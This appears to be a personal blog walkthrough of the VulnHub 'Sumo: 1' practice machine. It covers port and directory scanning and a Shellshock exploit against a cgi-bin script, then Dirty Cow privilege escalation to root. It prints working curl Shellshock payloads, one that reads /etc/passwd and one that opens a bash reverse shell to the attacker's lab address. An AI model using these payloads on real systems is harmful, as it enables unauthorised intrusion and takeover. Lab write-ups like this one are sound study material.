Persecure : my learning archive

Sumo : 1

https://www.vulnhub.com/entry/sumo-1,480/

Review

  • Enumeration indicates the possibility of a shellshock exploit
  • Scan and test for shellshock vulnerability
  • Use shellshock to get a reverse shell
  • Linux enumeration indicates the kernel is outdated
  • Use known outdated Linux exploit like Dirty Cow to gain privilege access

Enumeration

Run nmap scan to find for open ports.

Port 80

Run a gobuster scan to find for hidden directories.

/cgi-bin/ has 403 status. Run another scan on it.

/cgi-bin/ has be known to have shellshock vulnerability , use a nmap script to check if this vulnerability is available on the test script.

Vulnerability found.

Let’s test using the shellshock script.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.18.12:80/cgi-bin/test.sh

Inject a reverse shell via the shell shock script.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.18.2/1234 0>&1'" http://192.168.18.12/cgi-bin/test.sh

Foothold

User access gained.

Upload linpeas to find for some clues.

The linux kernel is outdated

Check online for the kernel exploit and we can use the dirty cow exploit.

Upload the exploit to the victim machine.

Got an error compiling the code.

Google indicates to change the path directory.

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

Privilege escalation

New account created

Switch to the new user.

Root flag is found.

Create a website or blog at WordPress.com